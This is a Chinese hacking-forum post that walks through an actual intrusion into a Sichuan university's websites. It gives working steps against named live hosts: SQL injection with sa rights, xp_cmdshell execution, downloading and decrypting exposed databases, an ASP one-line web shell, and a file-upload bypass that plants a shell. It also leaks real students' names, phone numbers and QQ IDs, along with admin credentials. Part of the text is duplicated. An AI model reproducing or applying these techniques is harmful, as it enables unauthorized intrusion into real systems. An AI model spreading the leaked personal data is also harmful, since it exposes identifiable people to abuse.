HanDs
管理员

[入侵交流] [拿shell方法] 渗透四川师范大学文理学院思路 



未深入.简单玩玩

===================================、
规则:静态。。 jsp


二级域名下有很多动态~~


125.71.200.234
http://125.71.200.244/ConfigWeb%5CIndex.aspx


GUID 应包含带 4 个短划线的 32 位数(xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx)。 


过滤了


先分析下,不用急着C段


http://zfx.scnucas.com/ConfigWeb/Index.aspx 进入旧网站,架构ASPX


http://cache.baiducontent.com/c?

m=9f65cb4a8c8507ed4fece763105392230e54f7306792874e2f87cf1d84642c101a39fef060754643cec57a6204ac4958ede736056d457fe98f8dd50a8bb4c37e7edb6623716c914165c418df9c1062d621e04de9d80ee6caa16e84aea38d82010

896&p=9e759a41d38804be4ba8c7710f49&newp=882a9140808218e90ab0c7710f0592695803ed633dd5d6433e8dd51ace&user=baidu&fm=sc&query=cdcas.edu.cn+login&qid=d716b7e800055e58&p1=8


找到一些页面

zsjy.cdcas.edu.cn/system/about/NewsDetails.asp?Id=89 一处注入

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]将 varchar 值 '89 and 1=2' 转换为数据类型为 int 的列时发生语法错误。

/system/about/NewsDetails.asp,行 250 

mssql Sa权限,别高兴太早。。。

我们看看能不能列目录

居然完全暴露了


[url=]http://zsjy.cdcas.edu.cn[/url]; 出现注入的是这个,那么zsjy是个重点

那么我们爬行不到任何东西,先把网站路径找出来

http://zsjy.cdcas.edu.cn/system/ 跟进也没用

能执行命令mssql ,看看先

x-cmdshell


172.16.184.120 本地局域网。。难道还要我做个转发。。我也是内网呢,真麻烦



IUSR_20130909-1658       IWAM_20130909-1658       mysql                    
sqldebug                 SQLDebugger              zsjyiis                  
命令运行完毕,但发生一个或多个错误。



E:\zsjyxy_20130315\adminuser\ 路径应该是这个,访问看看

http://zsjy.cdcas.edu.cn/_admin/login.asp G果然猜到后台了,那么既然二级都用这个,四川文理那个也跑不了

大部分学校都用这种思路,弱爆了

先看看域名情况

www.cdcas.edu.cn 解析了半天,没反应。。

cdcas.edu.cn:80 关闭
cdcas.edu.cn:8080 关闭
cdcas.edu.cn:3128 关闭
cdcas.edu.cn:8081 关闭
cdcas.edu.cn:9080 关闭
cdcas.edu.cn:1080 关闭
cdcas.edu.cn:21 关闭
cdcas.edu.cn:23 关闭
cdcas.edu.cn:443 关闭
cdcas.edu.cn:69 关闭
cdcas.edu.cn:22 关闭
cdcas.edu.cn:25 关闭
cdcas.edu.cn:110 关闭
cdcas.edu.cn:7001 关闭
cdcas.edu.cn:9090 关闭
cdcas.edu.cn:3389 关闭
cdcas.edu.cn:1521 关闭
cdcas.edu.cn:1158 关闭
cdcas.edu.cn:2100 关闭
cdcas.edu.cn:1433 关闭

其实这只是表面,换个思路看看



http://zsjy.cdcas.edu.cn/_admin/login.asp; 这个系统很熟悉,一时间记不起名字

data/ 先把数据库猜下

wy.mdb

wb.mdb

http://zsjy.cdcas.edu.cn/data/wb.mdb; 下载瞧瞧


还加了密的,果断解密

密码为qingsong


我还以为是什么呢
这些对我没用

bh    xm    mobilephone    qq    nbbc    nbzy    bz
3    你你    18978379273    87987897    职业鉴定    自学国贸    是国
4    赵莹莹    18108030543        职业鉴定    教师资格    
5    袁畅    18202839851    1227535966    自学考试    自考法律    
6    何柳    13795941385    474986170    自学考试    自考社工    
7    蒋依伲    15882446721    693158025    自学考试    自考社工    
8    张露怡    18202847707    704137759    自学考试    自考会计    
9    赵鑫    18202843607    710012340    自学考试    自考会计    
10    卿含芮    13707009379    894778511    自学考试    教师资格    
11    毛倩颖    13980053927    289104028    自学考试    自考汉文    
12    唐玉洁    15198236669    794147219    自学考试    自考会计    

---------------------------------------------------------


继续下载


http://zsjy.cdcas.edu.cn/data/yzxx.mdb 什么也没有

http://zsjy.cdcas.edu.cn/data/data.accdb

http://zsjy.cdcas.edu.cn/data/wb%E6%95%B0%E6%8D%AE%E5%BA%93%E5%A4%87%E4%BB%BD.mdb

不用进后台,先通过SA备份一句话。再看看情况

<%execute(request("cc"))%>

路径
E:\zsjyxy_20130315\_admin\x.asp

尝试把内容写入文件: E:\zsjyxy_20130315\_admin\x.asp
---------------------------------------------------------------
<%execute(request("cc"))%>

看看写进去没

没写进去?http://zsjy.cdcas.edu.cn/_admin.zip

http://zsjy.cdcas.edu.cn/_adminbackup/login.asp

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e4d'

[Microsoft][ODBC SQL Server Driver][SQL Server]用户 'sa' 登录失败。

/_adminbackup/_Conn_admin.asp,行 6 


写了1都无法写入?

Windows IP Configuration


路径
E:\zsjyxy_20130315\_admin\x.asp

尝试把内容写入文件: E:\zsjyxy_20130315\_admin\x.asp
---------------------------------------------------------------
<%execute(request("cc"))%>

看看写进去没

没写进去?http://zsjy.cdcas.edu.cn/_admin.zip

http://zsjy.cdcas.edu.cn/_adminbackup/login.asp

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e4d'

[Microsoft][ODBC SQL Server Driver][SQL Server]用户 'sa' 登录失败。

/_adminbackup/_Conn_admin.asp,行 6 


写了1都无法写入?

Windows IP Configuration

  Host Name . . . . . . . . . . . . : 20130909-1658


   Node Type . . . . . . . . . . . . : Broadcast

   IP Routing Enabled. . . . . . . . : Yes

   WINS Proxy Enabled. . . . . . . . : Yes





   Description . . . . . . . . . . . : Realtek PCIe GBE Family Controller

   Physical Address. . . . . . . . . : 74-27-EA-B8-BD-E7

   DHCP Enabled. . . . . . . . . . . : No

   IP Address. . . . . . . . . . . . : 172.16.184.120

   Subnet Mask . . . . . . . . . . . : 255.255.255.0

   Default Gateway . . . . . . . . . : 172.16.184.254

   DNS Servers . . . . . . . . . . . : 61.139.2.69



==========================================================================
猜出来了,用户admin 密码qingsong

http://zsjy.cdcas.edu.cn/adminuser/ 
好蛋痛




    admin
    天父地母
    √
    admin
    √
    修改|锁定|解锁

    chenfei
    leo280
    √
    陈飞
    √
    修改|锁定|解锁

    yangyang
    leo280
    √
    杨洋
    √
    修改|锁定|解锁

    chenbo
    admin
    √
    陈波
    √
    修改|锁定|解锁

    lijiefeng
    admin
    √
    李界峰
    √
    修改|锁定|解锁

    xusihui
    admin
    √
    许思辉
    √
    修改|锁定|解锁



汗,果断点

http://zsjy.cdcas.edu.cn/images/Flash/upfile_flash.asp 

上传漏洞


抓个包包

取得 cookie

Cookie: ASPSESSIONIDQCBDSAAB=GJMLKHDCFNDNGHFEDMMDDEMC


HTTP/1.1 200 OK
Date: Wed, 20 May 2015 12:40:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 258
Content-Type: text/html
Cache-control: private

201552020402339228.jpg201552020402339228.jpgnihao.jpg上传成功!<br><script>window.opener.document...value='201552020402339228.jpg'</script>
<script language="javascript">
window.alert("文件上传成功!请不要修改生成的链接地址!");
window.close();
</script>

不知道用NC截断行不行..

貌似有点问题


burp看看

<img border=0 src="/uploads/2015520/20150520204572927292.png"> 路径在这

-----------------------------7df1fc316b0d4e
Content-Disposition: form-data; name="file1"; filename="C:\Documents and Settings\Administrator\×ÀÃæ\bd_jpg.asp"
Content-Type: image/x-png

奇葩

呵呵,笑了

看看


big.jpg.asp这种可以绕过检查,直接得到小马,路径找了半天,在这

http://zsjy.cdcas.edu.cn/images/Flash/201552020474540172.asp


我传的,,接下来,你懂的

http://zsjy.cdcas.edu.cn/images/Flash/xxx.asp 成功得到shell
http://zsjy.cdcas.edu.cn/images/Flash/j.asp

8 [管理员用户]账号名: Administrator 
账号名: SQLDebugger 

C:\360Rec 可读,可写。

读下iis.vbs

上传CMD缺少对象,直接到菜刀。。传


http://zsjy.cdcas.edu.cn/x.asp

Microsoft (R) Windows Script Host Version 5.7
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。

默认网站 IUSR_20130909-1658 46[&+{(6']w|L\ :80: E:\zsjyxy_20130315


from : http://www.xxx.com/



我就不说了。。
======================================


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
渗透 四川 师范大学 文理学院 思路
#1楼
发帖时间:2016-8-29   |   查看数:0   |   回复数:0
游客组
快速回复